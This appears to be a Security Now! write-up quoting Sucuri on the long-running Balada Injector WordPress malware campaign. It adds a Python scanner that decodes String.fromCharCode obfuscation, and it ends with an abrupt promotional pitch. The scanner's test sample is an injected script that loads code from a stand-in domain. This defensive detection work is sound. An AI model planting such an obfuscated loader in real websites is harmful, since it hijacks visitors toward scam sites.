Security Now! #918
Our team at Sucuri has been tracking a massive WordPress infection campaign since 2017 — but up until recently never bothered to give it a proper name. Typically, we refer to it as an ongoing, long-lasting, massive WordPress infection campaign that leverages all known and recently discovered theme and plugin vulnerabilities. Other organizations and blogs have described it in a similar manner, sometimes adding terms like “malvertising campaign” or naming domains that it was currently using, which amount to several hundred over the past 6 years. This campaign is easily identified by its preference for String.fromCharCode obfuscation, the use of freshly registered domain names hosting malicious scripts on random subdomains, and by redirects to various scam sites including fake tech support, fraudulent lottery wins, and more recently, push notification scams displaying bogus captcha pages asking users to “Please Allow to verify, that you are not a robot”. Since 2017, we estimate that over one million WordPress websites have been infected by this campaign. Each year it consistently ranks in the top 3 of the infections that we detect and clean from compromised websites. Last year, in 2022 alone, our external website scanner SiteCheck detected this malware over 141,000 times, with more than 67% of websites loading scripts from known Balada Injector domains. We currently have more than 100 signatures covering both front-end and back-end variations of the malware injected into server files and WordPress databases. As you can imagine, referring to this massive infection campaign using generic terms has not been convenient. However, assigning a name to this malware was never at the top of our priority list. Our security researchers deal with dozens of new malware samples every day, so we typically don’t dwell too much on well-known malware that is adequately covered by detection rules and only necessitates minor adjustments when we spot a new wave.
In late December last year, our colleagues at Dr.Web shared some valuable information that led us to choose the name “Balada Injector”. A post published on December 30, 2022, titled “Linux backdoor malware infects WordPress-based websites” caught our attention, and it was widely circulated in Internet security blogs with titles like “Linux Malware uses 30 plugin vulnerabilities to target WordPress sites”. The article discusses two variants of the malware: Linux.BackDoor.WordPressExploit.1 and Linux.BackDoor.WordPressExploit.2 and provides a comprehensive overview, including targeted plugins and various indicators of compromise. The interest generated by this information prompted numerous inquiries from various sources, leading us to examine the post closely on New Year’s Eve to determine if immediate action was required. To our surprise, we instantly recognized the described malware as the ongoing, massive campaign we’d been tracking for years. Upon closer inspection, we found that the information provided was accurate, but the vulnerabilities, injected code, and malicious domains all dated back to 2019 and 2020. Nevertheless, the post offered interesting details about how campaign operators searched for vulnerable websites and injected malware. We soon obtained samples of the Linux binaries written in Go language from VirusTotal, where other security researchers had been creating collections. Most of the samples were compiled with debug information and even a simple “strings” command provided quite insightful information: names of functions, string constants, paths of files included in the project. These files consist mostly of source code for various Go libraries, providing additional functionality such as conversion functions and support for Internet protocols. However, the main malware code was located in the file C:/Users/host/Desktop/balada/client/main.go. 
The file path balada/client implied that the developer could refer to this software as Balada Client (we know that the malware sends data to a C2 server, so there could be a Balada Server part too). Whether our assumptions were correct or not, we adopted this name internally and think that it provides some convenience when talking about a really long-lasting malware campaign. In many languages, Balada means “Ballad”. To avoid ambiguity, we added the word Injector to reflect the nature of the malware campaign that injects malicious code into WordPress sites, hence Balada Injector.
So, some interesting background about a long-lived multi-year — as in six years and counting — highly aggressive and effective focused campaign against WordPress sites. It’s easy to become inured to big numbers, but one million individually infected WordPress sites is a lot of sites. So I wanted to cover this now, since I suspect this won't be the last we're hearing about this quite determined Balada Injector WordPress malware.
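The Sucuri post above names String.fromCharCode obfuscation as the campaign's most recognizable front-end trait: the injected script builds its loader URL from a list of character codes so that the domain never appears in plain text. The following is an added example, not code from Sucuri's post or from the Balada binaries, of how a scanner can undo that trick and pull the hidden host out of a page. The sample HTML, the domain ab12.example.net and the function names are all constructed for this illustration; the "Please Allow to verify" lure string comes from the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample of an injected loader in the style the post describes:
# the script src is assembled from String.fromCharCode so the hostname is not
# visible to a naive grep. The domain is made up for this example.
SAMPLE_HTML = """<script>var s=document.createElement('script');
s.src=String.fromCharCode(104,116,116,112,115,58,47,47,97,98,49,50,46,101,120,97,
109,112,108,101,46,110,101,116,47,115,46,106,115);
document.head.appendChild(s);</script>"""

# Matches String.fromCharCode( ... ) with a comma-separated list of decimal codes,
# tolerating the newlines and spaces injectors often sprinkle into the list.
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Lure text quoted in the Sucuri post (push-notification captcha scam).
LURE_TEXT = "Please Allow to verify, that you are not a robot"


def decode_fromcharcode(js: str) -> list[str]:
    """Return the plaintext of every String.fromCharCode(...) call found in js."""
    decoded = []
    for m in FROMCHARCODE_RE.finditer(js):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def extract_hosts(decoded: list[str]) -> list[str]:
    """Pull hostnames out of any URLs that appear in the decoded strings."""
    hosts = []
    for s in decoded:
        for url in URL_RE.findall(s):
            host = urlparse(url).hostname
            if host:
                hosts.append(host)
    return hosts


def scan(html: str) -> dict:
    """Decode obfuscated strings and flag pages that hide a script URL or the lure.

    Legitimate code rarely needs to hide a full URL behind fromCharCode, so a
    decoded URL is treated as suspicious on its own; a decoded "Hi" is not.
    """
    decoded = decode_fromcharcode(html)
    hosts = extract_hosts(decoded)
    lure = any(LURE_TEXT in s for s in decoded) or LURE_TEXT in html
    return {
        "decoded": decoded,
        "hosts": hosts,
        "suspicious": bool(hosts) or lure,
    }


if __name__ == "__main__":
    result = scan(SAMPLE_HTML)
    for s in result["decoded"]:
        print("decoded:", s)
    print("hosts:", result["hosts"], "suspicious:", result["suspicious"])
```

In practice the extracted hosts are what you feed into a blocklist or WHOIS age check: the post notes the campaign rotates through freshly registered domains with random subdomains, so a decoded host that was registered days ago is a stronger signal than the obfuscation alone.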
Just because everyone else seems to be using WordPress, it does not mean it's the best to use. It's full of security bugs and privacy issues, and off-the-shelf software like this is a big target for hackers, and there is a bigger target and reward once hacked. Maybe it's time to change; if so, we can help.